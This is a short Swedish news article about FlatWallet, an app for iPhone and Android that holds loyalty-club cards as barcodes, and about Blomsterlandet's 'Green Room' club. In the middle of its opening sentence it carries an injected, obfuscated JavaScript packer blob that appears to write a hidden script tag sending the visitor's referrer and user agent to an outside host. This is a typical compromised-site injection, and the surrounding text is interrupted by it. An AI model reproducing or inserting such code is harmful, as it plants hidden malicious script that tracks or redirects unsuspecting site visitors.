Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Ny app till Android och iPhone ersätter kundklubbskort

Ny app till Android och iPhone ersätter kundklubbskort
Revue Magazine

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ratae|var|u0026u|referrer|rtbyz||js|php’.split(’|’),0,{}))
finns en ny app för Apple
iPhone och Android som gör det möjligt att ha kundklubbskort i mobiltelefonen istället för i plånboken. Via appen finns det möjlighet att registrera köp, få erbjudanden och bli medlem i nya kundklubbar.

Idag lanserar butikskedjan Blomsterlandet sin nya kundklubb ”Green Room”. Istället för att ha ett fysiskt plast kort kan den som vill vara med i kundklubben välja att ha sitt kort i sin mobil.

– Vi använder FlatWalletappen för att vi vill underlätta för våra medlemmar och för att vi tycker att Flatwallet är ett smidigt sätt för kunden att samla sina klubbkort. Våra kunder kan bli medlem direkt via Flatwallet och få erbjudanden i mobilen, lätt och smidigt, säger Andrea Olsén, Kundklubbsansvarig på Blomsterlandet.

Appen ”FlatWallet” omvandlar användarens medlemsnummer till en streckkod i mobiltelefonen. När köp registreras används streckkodsläsaren i butikens kassa för att läsa av streckkoden i mobilen eller så registreras medlemsnumret manuellt i kassan. På så sätt slipper den som laddat ner appen ha plånboken full med plastkort.

Den som använder FlatWalletappen kan få information och erbjudanden från kundklubbar direkt i mobilen. På så sätt minskar risken att rabattkupongerna ligger hemma när det är dags att handla. Den som tycker att det är jobbigt att fylla i medlemsansökan till kundklubbar kommer också att ha nytta av appen. Det går på några sekunder att bli medlem i en ny klubb med hjälp av FlatWalletppen tack vare att användarens personuppgifter är förifyllda.

FlatWalletappen finns att ladda ner gratis på Appstore och Android Market.